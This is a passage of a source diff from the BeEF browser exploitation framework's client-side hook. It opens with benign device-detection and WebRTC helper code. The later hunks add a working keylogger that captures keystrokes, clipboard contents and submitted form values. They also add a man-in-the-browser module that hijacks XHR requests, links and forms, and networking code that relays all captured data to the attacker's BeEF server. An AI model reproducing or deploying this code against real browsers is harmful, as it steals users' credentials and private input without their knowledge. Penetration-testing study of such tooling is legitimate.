+      (uagent.search(deviceTablet) > -1))
+      return true;
+   else
+      return false;
+}
+
+function DetectSonyPlaystation()
+{
+   if (uagent.search(devicePlaystation) > -1)
+      return true;
+   else
+      return false;
+};
+
+function DetectNintendo()
+{
+   if (uagent.search(deviceNintendo) > -1   ||
+	uagent.search(deviceWii) > -1 ||
+	uagent.search(deviceNintendoDs) > -1)
+      return true;
+   else
+      return false;
+};
+
+function DetectXbox()
+{
+   if (uagent.search(deviceXbox) > -1)
+      return true;
+   else
+      return false;
+};
+
+function DetectGameConsole()
+{
+   if (DetectSonyPlaystation())
+      return true;
+   if (DetectNintendo())
+      return true;
+   if (DetectXbox())
+      return true;
+   else
+      return false;
+};
+
+function DetectKindle()
+{
+   if (uagent.search(deviceKindle) > -1 &&
+       !DetectAndroid())
+      return true;
+   else
+      return false;
+}
+
+function DetectAmazonSilk()
+{
+   if (uagent.search(engineSilk) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectMobileQuick()
+{
+   if (DetectTierTablet())
+      return false;
+
+   if (DetectSmartphone())
+      return true;
+
+   if (uagent.search(deviceMidp) > -1 ||
+	DetectBrewDevice())
+      return true;
+
+   if (DetectOperaMobile())
+      return true;
+
+   if (uagent.search(engineNetfront) > -1)
+      return true;
+   if (uagent.search(engineUpBrowser) > -1)
+      return true;
+   if (uagent.search(engineOpenWeb) > -1)
+      return true;
+
+   if (DetectDangerHiptop())
+      return true;
+
+   if (DetectMaemoTablet())
+      return true;
+   if (DetectArchos())
+      return true;
+
+   if ((uagent.search(devicePda) > -1) &&
+        !(uagent.search(disUpdate) > -1))
+      return true;
+   if (uagent.search(mobile) > -1)
+      return true;
+
+   if (DetectKindle() ||
+       DetectAmazonSilk())
+      return true;
+
+   return false;
+};
+
+
+function DetectMobileLong()
+{
+   if (DetectMobileQuick())
+      return true;
+   if (DetectGameConsole())
+      return true;
+   if (DetectSonyMylo())
+      return true;
+
+   if (uagent.search(manuSamsung1) > -1 ||
+	uagent.search(manuSonyEricsson) > -1 ||
+	uagent.search(manuericsson) > -1)
+      return true;
+
+   if (uagent.search(svcDocomo) > -1)
+      return true;
+   if (uagent.search(svcKddi) > -1)
+      return true;
+   if (uagent.search(svcVodafone) > -1)
+      return true;
+
+
+   return false;
+};
+
+
+function DetectTierTablet()
+{
+   if (DetectIpad()
+        || DetectAndroidTablet()
+        || DetectBlackBerryTablet()
+        || DetectWebOSTablet())
+      return true;
+   else
+      return false;
+};
+
+function DetectTierIphone()
+{
+   if (DetectIphoneOrIpod())
+      return true;
+   if (DetectAndroidPhone())
+      return true;
+   if (DetectBlackBerryWebKit() && DetectBlackBerryTouch())
+      return true;
+   if (DetectWindowsPhone7())
+      return true;
+   if (DetectPalmWebOS())
+      return true;
+   if (DetectGarminNuvifone())
+      return true;
+   else
+      return false;
+};
+
+function DetectTierRichCss()
+{
+    if (DetectMobileQuick())
+    {
+       if (DetectTierIphone() || DetectKindle())
+          return false;
+
+       if (DetectWebkit())
+          return true;
+       if (DetectS60OssBrowser())
+          return true;
+
+       if (DetectBlackBerryHigh())
+          return true;
+
+       if (DetectWindowsMobile())
+          return true;
+
+       if (uagent.search(engineTelecaQ) > -1)
+          return true;
+
+       else
+          return false;
+    }
+    else
+      return false;
+};
+
+function DetectTierOtherPhones()
+{
+    if (DetectMobileLong())
+    {
+       if (DetectTierIphone() || DetectTierRichCss())
+          return false;
+
+       else
+          return true;
+    }
+    else
+      return false;
+};
+
+
+function InitDeviceScan()
+{
+    isIphone = DetectIphoneOrIpod();
+    isAndroidPhone = DetectAndroidPhone();
+    isTierIphone = DetectTierIphone();
+    isTierTablet = DetectTierTablet();
+
+    isTierRichCss = DetectTierRichCss();
+    isTierGenericMobile = DetectTierOtherPhones();
+};
+
+InitDeviceScan()
--- a/core/main/client/lib/webrtcadapter.js
+++ b/core/main/client/lib/webrtcadapter.js
@@ -0,0 +1,200 @@
+var RTCPeerConnection = null;
+var getUserMedia = null;
+var attachMediaStream = null;
+var reattachMediaStream = null;
+var webrtcDetectedBrowser = null;
+var webrtcDetectedVersion = null;
+
+function maybeFixConfiguration(pcConfig) {
+  if (pcConfig === null) {
+    return;
+  }
+  for (var i = 0; i < pcConfig.iceServers.length; i++) {
+    if (pcConfig.iceServers[i].hasOwnProperty('urls')){
+      if (pcConfig.iceServers[i]['urls'].length > 0) {
+        // In FF - we just take the FIRST STUN Server
+        pcConfig.iceServers[i]['url'] = pcConfig.iceServers[i]['urls'][0];
+      } else {
+        pcConfig.iceServers[i]['url'] = pcConfig.iceServers[i]['urls'];
+      }
+      delete pcConfig.iceServers[i]['urls'];
+    }
+  }
+}
+
+if (navigator.mozGetUserMedia) {
+
+  webrtcDetectedBrowser = "firefox";
+
+  webrtcDetectedVersion =
+           parseInt(navigator.userAgent.match(/Firefox\/([0-9]+)\./)[1], 10);
+
+  // The RTCPeerConnection object.
+  var RTCPeerConnection = function(pcConfig, pcConstraints) {
+    // .urls is not supported in FF yet.
+    maybeFixConfiguration(pcConfig);
+    return new mozRTCPeerConnection(pcConfig, pcConstraints);
+  }
+
+  // The RTCSessionDescription object.
+  RTCSessionDescription = mozRTCSessionDescription;
+
+  // The RTCIceCandidate object.
+  RTCIceCandidate = mozRTCIceCandidate;
+
+  // Get UserMedia (only difference is the prefix).
+  // Code from Adam Barth.
+  getUserMedia = navigator.mozGetUserMedia.bind(navigator);
+  navigator.getUserMedia = getUserMedia;
+
+  // Creates iceServer from the url for FF.
+  createIceServer = function(url, username, password) {
+    var iceServer = null;
+    var url_parts = url.split(':');
+    if (url_parts[0].indexOf('stun') === 0) {
+      // Create iceServer with stun url.
+      iceServer = { 'url': url };
+    } else if (url_parts[0].indexOf('turn') === 0) {
+      if (webrtcDetectedVersion < 27) {
+        // Create iceServer with turn url.
+        // Ignore the transport parameter from TURN url for FF version <=27.
+        var turn_url_parts = url.split("?");
+        // Return null for createIceServer if transport=tcp.
+        if (turn_url_parts.length === 1 ||
+            turn_url_parts[1].indexOf('transport=udp') === 0) {
+          iceServer = {'url': turn_url_parts[0],
+                       'credential': password,
+                       'username': username};
+        }
+      } else {
+        // FF 27 and above supports transport parameters in TURN url,
+        // So passing in the full url to create iceServer.
+        iceServer = {'url': url,
+                     'credential': password,
+                     'username': username};
+      }
+    }
+    return iceServer;
+  };
+
+  createIceServers = function(urls, username, password) {
+    var iceServers = [];
+    // Use .url for FireFox.
+    for (i = 0; i < urls.length; i++) {
+      var iceServer = createIceServer(urls[i],
+                                      username,
+                                      password);
+      if (iceServer !== null) {
+        iceServers.push(iceServer);
+      }
+    }
+    return iceServers;
+  }
+
+  // Attach a media stream to an element.
+  attachMediaStream = function(element, stream) {
+    console.log("Attaching media stream");
+    element.mozSrcObject = stream;
+    element.play();
+  };
+
+  reattachMediaStream = function(to, from) {
+    console.log("Reattaching media stream");
+    to.mozSrcObject = from.mozSrcObject;
+    to.play();
+  };
+
+  // Fake get{Video,Audio}Tracks
+  if (!MediaStream.prototype.getVideoTracks) {
+    MediaStream.prototype.getVideoTracks = function() {
+      return [];
+    };
+  }
+
+  if (!MediaStream.prototype.getAudioTracks) {
+    MediaStream.prototype.getAudioTracks = function() {
+      return [];
+    };
+  }
+} else if (navigator.webkitGetUserMedia) {
+
+  webrtcDetectedBrowser = "chrome";
+  // Temporary fix until crbug/374263 is fixed.
+  // Setting Chrome version to 999, if version is unavailable.
+  var result = navigator.userAgent.match(/Chrom(e|ium)\/([0-9]+)\./);
+  if (result !== null) {
+    webrtcDetectedVersion = parseInt(result[2], 10);
+  } else {
+    webrtcDetectedVersion = 999;
+  }
+
+  // Creates iceServer from the url for Chrome M33 and earlier.
+  createIceServer = function(url, username, password) {
+    var iceServer = null;
+    var url_parts = url.split(':');
+    if (url_parts[0].indexOf('stun') === 0) {
+      // Create iceServer with stun url.
+      iceServer = { 'url': url };
+    } else if (url_parts[0].indexOf('turn') === 0) {
+      // Chrome M28 & above uses below TURN format.
+      iceServer = {'url': url,
+                   'credential': password,
+                   'username': username};
+    }
+    return iceServer;
+  };
+
+  // Creates iceServers from the urls for Chrome M34 and above.
+  createIceServers = function(urls, username, password) {
+    var iceServers = [];
+    if (webrtcDetectedVersion >= 34) {
+      // .urls is supported since Chrome M34.
+      iceServers = {'urls': urls,
+                    'credential': password,
+                    'username': username };
+    } else {
+      for (i = 0; i < urls.length; i++) {
+        var iceServer = createIceServer(urls[i],
+                                        username,
+                                        password);
+        if (iceServer !== null) {
+          iceServers.push(iceServer);
+        }
+      }
+    }
+    return iceServers;
+  };
+
+  // The RTCPeerConnection object.
+  var RTCPeerConnection = function(pcConfig, pcConstraints) {
+    // .urls is supported since Chrome M34.
+    if (webrtcDetectedVersion < 34) {
+      maybeFixConfiguration(pcConfig);
+    }
+    return new webkitRTCPeerConnection(pcConfig, pcConstraints);
+  }
+
+  // Get UserMedia (only difference is the prefix).
+  // Code from Adam Barth.
+  getUserMedia = navigator.webkitGetUserMedia.bind(navigator);
+  navigator.getUserMedia = getUserMedia;
+
+  // Attach a media stream to an element.
+  attachMediaStream = function(element, stream) {
+    if (typeof element.srcObject !== 'undefined') {
+      element.srcObject = stream;
+    } else if (typeof element.mozSrcObject !== 'undefined') {
+      element.mozSrcObject = stream;
+    } else if (typeof element.src !== 'undefined') {
+      element.src = URL.createObjectURL(stream);
+    } else {
+      console.log('Error attaching stream to element.');
+    }
+  };
+
+  reattachMediaStream = function(to, from) {
+    to.src = from.src;
+  };
+} else {
+  console.log("Browser does not appear to be WebRTC-capable");
+}
--- a/core/main/client/logger.js
+++ b/core/main/client/logger.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
 * @literal object: beef.logger
 *
@@ -52,15 +43,19 @@ beef.logger = {
        this.y = 0;
        this.target = null;
        this.data = null;
+        this.mods = null;
    },
 	
 	/**
 	 * Starts the logger
 	 */
 	start: function() {
+
+		beef.browser.hookChildFrames();
 		this.running = true;
 		var d = new Date();
 		this.time = d.getTime();
+
 		$j(document).keypress(
 			function(e) { beef.logger.keypress(e); }
 		).click(
@@ -71,9 +66,18 @@ beef.logger = {
 		).blur(
 			function(e) { beef.logger.win_blur(e); }
 		);
-		/*$j('form').submit(
+		$j('form').submit(
 			function(e) { beef.logger.submit(e); }
-		);*/
+		);
+		document.body.oncopy = function() {
+			setTimeout("beef.logger.copy();", 10);
+		};
+		document.body.oncut = function() {
+			setTimeout("beef.logger.cut();", 10);
+		};
+		document.body.onpaste = function() {
+			beef.logger.paste();
+		}
 	},
 	
 	/**
@@ -137,11 +141,57 @@ beef.logger = {
 	},
 	
 	/**
-	 * Is called whenever a form is submitted
+	 * Copy function fires when the user copies data to the clipboard.
+	 */
+	copy: function(x) {
+		try {
+			var c = new beef.logger.e();
+			c.type = 'copy';
+			c.data = clipboardData.getData("Text");
+			this.events.push(c);
+		} catch(e) {}
+	},
+
+	/**
+	 * Cut function fires when the user cuts data to the clipboard.
+	 */
+	cut: function() {
+		try {
+			var c = new beef.logger.e();
+			c.type = 'cut';
+			c.data = clipboardData.getData("Text");
+			this.events.push(c);
+		} catch(e) {}
+	},
+
+	/**
+	 * Paste function fires when the user pastes data from the clipboard.
+	 */
+	paste: function() {
+		try {
+			var c = new beef.logger.e();
+			c.type = 'paste';
+			c.data = clipboardData.getData("Text");
+			this.events.push(c);
+		} catch(e) {}
+	},
+
+	/**
+	 * Submit function fires whenever a form is submitted
     * TODO: Cleanup this function
 	 */
 	submit: function(e) {
-		/*this.events.push('Form submission: Action: '+$j(e.target).attr('action')+' Method: '+$j(e.target).attr('method')+' @ '+beef.logger.get_timestamp()+'s > '+beef.logger.get_dom_identifier(e.target));*/
+		try {
+			var f = new beef.logger.e();
+			var values = "";
+			f.type = 'submit';
+			f.target = beef.logger.get_dom_identifier(e.target);
+			for (var i = 0; i < e.target.elements.length; i++) {
+	            values += "["+i+"] "+e.target.elements[i].name+"="+e.target.elements[i].value+"\n";
+	        }
+			f.data = 'Action: '+$j(e.target).attr('action')+' - Method: '+$j(e.target).attr('method') + ' - Values:\n'+values;
+			this.events.push(f);
+		} catch(e) {}
 	},
 	
 	/**
@@ -184,17 +234,28 @@ beef.logger = {
 	 */
 	parse_stream: function() {
 		var s = '';
-		for (var i in this.stream)
-		{
-			//s += (this.stream[i]['modifiers']['alt']) ? '*alt* ' : '';
-			//s += (this.stream[i]['modifiers']['ctrl']) ? '*ctrl* ' : '';
-			//s += (this.stream[i]['modifiers']['shift']) ? 'Shift+' : '';
-			s += String.fromCharCode(this.stream[i]['char']);
+        var mods = '';
+		for (var i in this.stream){
+         try{
+            var mod = this.stream[i]['modifiers'];
+            s += String.fromCharCode(this.stream[i]['char']);
+            if(typeof mod != 'undefined' &&
+                      (mod['alt'] == true ||
+                      mod['ctrl'] == true ||
+                      mod['shift'] == true)){
+                mods += (mod['alt']) ? ' [Alt] ' : '';
+                mods += (mod['ctrl']) ? ' [Ctrl] ' : '';
+                mods += (mod['shift']) ? ' [Shift] ' : '';
+                mods += String.fromCharCode(this.stream[i]['char']);
+            }
+
+         }catch(e){}
 		}
        var k = new beef.logger.e();
        k.type = 'keys';
        k.target = beef.logger.get_dom_identifier();
        k.data = s;
+        k.mods = mods;
        return k;
 	},
 	
--- a/core/main/client/mitb.js
+++ b/core/main/client/mitb.js
@@ -1,135 +1,222 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-
-beef.mitb = {
-	
-	cid: null,
-	curl: null,
-	
-	init: function(cid, curl){
-		beef.mitb.cid = cid;
-		beef.mitb.curl = curl;
-	},
-	
-	// Initializes the hook on anchors and forms.
-	hook: function(){ 	
-		beef.onpopstate.push(function(event) {beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);});
-		beef.onclose.push(function(event) {beef.mitb.endSession();});
-		var anchors = document.getElementsByTagName("a");
-		var forms = document.getElementsByTagName("form");
-		for(var i=0;i<anchors.length;i++){
-			anchors[i].onclick = beef.mitb.poisonAnchor;
-		}
-		for(var i=0;i<forms.length;i++){
-			beef.mitb.poisonForm(forms[i]);
-		}
-	},
-	
-	// Hooks anchors and prevents them from linking away
-	poisonAnchor: function(e){
-		try{
-			e.preventDefault;
-			if(beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])){
-				var title = "";
-				if(document.getElementsByTagName("title").length == 0){
-					title = document.title;
-				}else{
-					title = document.getElementsByTagName("title")[0].innerHTML;
-				}
-				history.pushState({ Be: "EF" }, title, e.currentTarget);
-			}
-		}catch(e){
-			console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
-		}
-		return false;
-	},
-	
-	// Hooks forms and prevents them from linking away
-	poisonForm: function(form){
-		form.onsubmit=function(e){
-			var inputs = form.getElementsByTagName("input");
-			var query = "";
-			for(var i=0;i<inputs.length;i++){
-				if(i>0 && i<inputs.length-1) query += "&";
-				switch(inputs[i].type){
-					case "submit":
-						break;
-					default:
-						query += inputs[i].name + "=" + inputs[i].value;
-						break;
-				}
-			}
-			e.preventdefault;
-			beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
-			history.pushState({ Be: "EF" }, "", form.action);
-			return false;
-		}
-	},
-	
-	// Fetches a hooked form with AJAX
-	fetchForm: function(url, query, target){
-		try{
-			var y = new XMLHttpRequest();
-			y.open('POST', url, false);
-			y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
-			y.onreadystatechange = function(){
-				if(y.readyState == 4 && y.responseText != ""){
-					target.innerHTML = y.responseText;
-					setTimeout(beef.mitb.hook, 10);
-				}
-			}
-			y.send(query);
-			beef.mitb.sniff("POST: "+url+" ["+query+"]");
-			return true;
-		}catch(x){
-			return false;
-		}
-	},
-	
-	// Fetches a hooked link with AJAX
-	fetch: function(url, target){
-		try{
-			var y = new XMLHttpRequest();
-			y.open('GET', url,false);
-			y.onreadystatechange = function(){
-				if(y.readyState == 4 && y.responseText != ""){
-					target.innerHTML = y.responseText;
-					setTimeout(beef.mitb.hook, 10);
-				}
-			}
-			y.send(null);
-			beef.mitb.sniff("GET: "+url);
-			return true;
-		}catch(x){
-			window.open(url);
-			beef.mitb.sniff("GET [New Window]: "+url);
-			return false;
-		}
-	},
-	
-	// Relays an entry to the framework
-	sniff: function(result){
-		try{
-			beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
-		}catch(x){}
-		return true;
-	},
-	
-	// Signals the Framework that the user has lost the hook
-	endSession: function(){
-		beef.mitb.sniff("Window closed.");
-	}
-}
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+
+beef.mitb = {
+
+    cid:null,
+    curl:null,
+
+    init:function (cid, curl) {
+        beef.mitb.cid = cid;
+        beef.mitb.curl = curl;
+        /*Override open method to intercept ajax request*/
+        var hook_file = "<%= @hook_file %>";
+
+        if (window.XMLHttpRequest && !(window.ActiveXObject)) {
+
+            beef.mitb.sniff("Method XMLHttpRequest.open override");
+            (function (open) {
+                XMLHttpRequest.prototype.open = function (method, url, async, mitb_call) {
+                    // Ignore it and don't hijack it. It's either a request to BeEF (hook file or Dynamic Handler)
+                    // or a request initiated by the MiTB itself.
+                    if (mitb_call || (url.indexOf(hook_file) != -1 || url.indexOf("/dh?") != -1)) {
+                        open.call(this, method, url, async, true);
+                    }else {
+                        var portRegex = new RegExp(":[0-9]+");
+                        var portR = portRegex.exec(url);
+                        var requestPort;
+                        if (portR != null) { requestPort = portR[0].split(":")[1]; }
+
+                        //GET request
+                        if (method == "GET") {
+                            //GET request -> cross-origin
+                            if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
+                                beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
+                                window.open(url);
+                            }else { //GET request -> same-origin
+                                beef.mitb.sniff("GET [Ajax Request]: " + url);
+                                if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
+                                    var title = "";
+                                    if (document.getElementsByTagName("title").length == 0) {
+                                        title = document.title;
+                                    } else {
+                                        title = document.getElementsByTagName("title")[0].innerHTML;
+                                    }
+                                    // write the url of the page
+                                    history.pushState({ Be:"EF" }, title, url);
+                                }
+                            }
+                        }else{
+                            //POST request
+                            beef.mitb.sniff("POST ajax request to: " + url);
+                            open.call(this, method, url, async, true);
+                        }
+                    }
+                };
+            })(XMLHttpRequest.prototype.open);
+        }
+    },
+
+    // Initializes the hook on anchors and forms.
+    hook:function () {
+        beef.onpopstate.push(function (event) {
+            beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);
+        });
+        beef.onclose.push(function (event) {
+            beef.mitb.endSession();
+        });
+
+        var anchors = document.getElementsByTagName("a");
+        var forms = document.getElementsByTagName("form");
+        var lis = document.getElementsByTagName("li");
+
+        for (var i = 0; i < anchors.length; i++) {
+            anchors[i].onclick = beef.mitb.poisonAnchor;
+        }
+        for (var i = 0; i < forms.length; i++) {
+            beef.mitb.poisonForm(forms[i]);
+        }
+
+        for (var i = 0; i < lis.length; i++) {
+            if (lis[i].hasAttribute("onclick")) {
+                lis[i].removeAttribute("onclick");
+                /*clear*/
+                lis[i].setAttribute("onclick", "beef.mitb.fetchOnclick('" + lis[i].getElementsByTagName("a")[0] + "')");
+                /*override*/
+
+            }
+        }
+    },
+
+    // Hooks anchors and prevents them from linking away
+    poisonAnchor:function (e) {
+        try {
+            e.preventDefault;
+            if (beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])) {
+                var title = "";
+                if (document.getElementsByTagName("title").length == 0) {
+                    title = document.title;
+                } else {
+                    title = document.getElementsByTagName("title")[0].innerHTML;
+                }
+                history.pushState({ Be:"EF" }, title, e.currentTarget);
+            }
+        } catch (e) {
+            beef.debug('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
+        }
+        return false;
+    },
+
+    // Hooks forms and prevents them from linking away
+    poisonForm:function (form) {
+        form.onsubmit = function (e) {
+            var inputs = form.getElementsByTagName("input");
+            var query = "";
+            for (var i = 0; i < inputs.length; i++) {
+                if (i > 0 && i < inputs.length - 1) query += "&";
+                switch (inputs[i].type) {
+                    case "submit":
+                        break;
+                    default:
+                        query += inputs[i].name + "=" + inputs[i].value;
+                        break;
+                }
+            }
+            e.preventdefault;
+            beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
+            history.pushState({ Be:"EF" }, "", form.action);
+            return false;
+        }
+    },
+
+    // Fetches a hooked form with AJAX
+    fetchForm:function (url, query, target) {
+        try {
+            var y = new XMLHttpRequest();
+            y.open('POST', url, false, true);
+            y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+            y.onreadystatechange = function () {
+                if (y.readyState == 4 && y.responseText != "") {
+                    target.innerHTML = y.responseText;
+                    setTimeout(beef.mitb.hook, 10);
+                }
+            };
+            y.send(query);
+            beef.mitb.sniff("POST: " + url + "[" + query + "]");
+            return true;
+        } catch (x) {
+            return false;
+        }
+    },
+
+    // Fetches a hooked link with AJAX
+    fetch:function (url, target) {
+        try {
+            var y = new XMLHttpRequest();
+            y.open('GET', url, false, true);
+            y.onreadystatechange = function () {
+                if (y.readyState == 4 && y.responseText != "") {
+                    target.innerHTML = y.responseText;
+                    setTimeout(beef.mitb.hook, 10);
+                }
+            };
+            y.send(null);
+            beef.mitb.sniff("GET: " + url);
+            return true;
+        } catch (x) {
+            window.open(url);
+            beef.mitb.sniff("GET [New Window]: " + url);
+            return false;
+        }
+    },
+
+    // Fetches a window.location=http://domainname.com and setting up history
+    fetchOnclick:function (url) {
+        try {
+            var target = document.getElementsByTagName("html")[0];
+            var y = new XMLHttpRequest();
+            y.open('GET', url, false, true);
+            y.onreadystatechange = function () {
+                if (y.readyState == 4 && y.responseText != "") {
+                    var title = "";
+                    if (document.getElementsByTagName("title").length == 0) {
+                        title = document.title;
+                    }
+                    else {
+                        title = document.getElementsByTagName("title")[0].innerHTML;
+                        }
+                    history.pushState({ Be:"EF" }, title, url);
+                    target.innerHTML = y.responseText;
+                    setTimeout(beef.mitb.hook, 10);
+                }
+            };
+            y.send(null);
+            beef.mitb.sniff("GET: " + url);
+
+        } catch (x) {
+            // the link is cross-origin, so load the resource in a different tab
+            window.open(url);
+            beef.mitb.sniff("GET [New Window]: " + url);
+        }
+    },
+
+    // Relays an entry to the framework
+    sniff:function (result) {
+        try {
+            beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
+        } catch (x) {
+        }
+        return true;
+    },
+
+    // Signals the Framework that the user has lost the hook
+    endSession:function () {
+        beef.mitb.sniff("Window closed.");
+    }
+};
+
+beef.regCmp('beef.mitb');
--- a/core/main/client/net.js
+++ b/core/main/client/net.js
@@ -1,70 +1,77 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
 * @literal object: beef.net
 *
- * Provides basic networking functions.
+ * Provides basic networking functions,
+ * like beef.net.request and beef.net.forgeRequest,
+ * used by BeEF command modules and the Requester extension,
+ * as well as beef.net.send which is used to return commands
+ * to BeEF server-side components.
+ *
+ * Also, it contains the core methods used by the XHR-polling
+ * mechanism (flush, queue)
 */
 beef.net = {

    host: "<%= @beef_host %>",
    port: "<%= @beef_port %>",
    hook: "<%= @beef_hook %>",
+    httpproto: "<%= @beef_proto %>",
    handler: '/dh',
    chop: 500,
    pad: 30, //this is the amount of padding for extra params such as pc, pid and sid
    sid_count: 0,
    cmd_queue: [],

-    //Command object
-    command: function() {
+    /**
+     * Command object. This represents the data to be sent back to BeEF,
+     * using the beef.net.send() method.
+     */
+    command: function () {
        this.cid = null;
        this.results = null;
        this.handler = null;
        this.callback = null;
    },

-    //Packet object
-    packet: function() {
+    /**
+     * Packet object. A single chunk of data. X packets -> 1 stream
+     */
+    packet: function () {
        this.id = null;
        this.data = null;
    },

-    //Stream object
-    stream: function() {
+    /**
+     * Stream object. Contains X packets, which are command result chunks.
+     */
+    stream: function () {
        this.id = null;
        this.packets = [];
        this.pc = 0;
-        this.get_base_url_length = function() {
+        this.get_base_url_length = function () {
            return (this.url + this.handler + '?' + 'bh=' + beef.session.get_hook_session_id()).length;
-        },
-            this.get_packet_data = function() {
-                var p = this.packets.shift();
-                return {'bh':beef.session.get_hook_session_id(), 'sid':this.id, 'pid':p.id, 'pc':this.pc, 'd':p.data }
-            };
+        };
+        this.get_packet_data = function () {
+            var p = this.packets.shift();
+            return {'bh': beef.session.get_hook_session_id(), 'sid': this.id, 'pid': p.id, 'pc': this.pc, 'd': p.data }
+        };
    },

    /**
     * Response Object - used in the beef.net.request callback
-     * Note: as we are using async mode, the response object will be empty if returned.Using sync mode, request obj fields will be populated.
+     * NOTE: as we are using async mode, the response object will be empty if returned.
+     * Using sync mode, request obj fields will be populated.
     */
-    response: function() {
+    response: function () {
        this.status_code = null;        // 500, 404, 200, 302
        this.status_text = null;        // success, timeout, error, ...
-        this.response_body = null;      // "<html>…." if not a cross domain request
+        this.response_body = null;      // "<html>…." if not a cross-origin request
        this.port_status = null;        // tcp port is open, closed or not http
        this.was_cross_domain = null;   // true or false
        this.was_timedout = null;       // the user specified timeout was reached
@@ -72,8 +79,14 @@ beef.net = {
        this.headers = null;            // full response headers
    },

-    //Queues the command, to be sent back to the framework on the next refresh
-    queue: function(handler, cid, results, callback) {
+    /**
+     * Queues the specified command results.
+     * @param: {String} handler: the server-side handler that will be called
+     * @param: {Integer} cid: command id
+     * @param: {String} results: the data to send
+     * @param: {Function} callback: the function to call after execution
+     */
+    queue: function (handler, cid, results, callback) {
        if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) {
            var s = new beef.net.command();
            s.cid = cid;
@@ -84,14 +97,41 @@ beef.net = {
        }
    },

-    //Queues the current command and flushes the queue straight away
-    send: function(handler, cid, results, callback) {
-        this.queue(handler, cid, results, callback);
-        this.flush();
+    /**
+     * Queues the current command results and flushes the queue straight away.
+     * NOTE: Always send Browser Fingerprinting results
+     * (beef.net.browser_details(); -> /init handler) using normal XHR-polling,
+     * even if WebSockets are enabled.
+     * @param: {String} handler: the server-side handler that will be called
+     * @param: {Integer} cid: command id
+     * @param: {String} results: the data to send
+     * @param: {Function} callback: the function to call after execution
+     */
+    send: function (handler, cid, results, callback) {
+        if (typeof beef.websocket === "undefined" || (handler === "/init" && cid == 0)) {
+            this.queue(handler, cid, results, callback);
+            this.flush();
+        } else {
+            try {
+                beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
+                    '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
+                    '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
+            } catch (e) {
+                this.queue(handler, cid, results, callback);
+                this.flush();
+            }
+        }
    },

-    //Flush all currently queued commands to the framework
-    flush: function() {
+    /**
+     * Flush all currently queued command results to the framework,
+     * chopping the data in chunks ('chunk' method) which will be re-assembled
+     * server-side by the network stack.
+     * NOTE: currently 'flush' is used only with the default
+     * XHR-polling mechanism. If WebSockets are used, the data is sent
+     * back to BeEF straight away.
+     */
+    flush: function () {
        if (this.cmd_queue.length > 0) {
            var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue));
            this.cmd_queue.length = 0;
@@ -114,22 +154,30 @@ beef.net = {
        }
    },

-    //Split string into chunk lengths determined by amount
-    chunk: function(str, amount) {
+    /**
+     * Split the input data into chunk lengths determined by the amount parameter.
+     * @param: {String} str: the input data
+     * @param: {Integer} amount: chunk length
+     */
+    chunk: function (str, amount) {
        if (typeof amount == 'undefined') n = 2;
        return str.match(RegExp('.{1,' + amount + '}', 'g'));
    },

-    //Push packets to framework
-    push: function(stream) {
+    /**
+     * Push the input stream back to the BeEF server-side components.
+     * It uses beef.net.request to send back the data.
+     * @param: {Object} stream: the stream object to be sent back.
+     */
+    push: function (stream) {
        //need to implement wait feature here eventually
        for (var i = 0; i < stream.pc; i++) {
-            this.request('http', 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
+            this.request(this.httpproto, 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
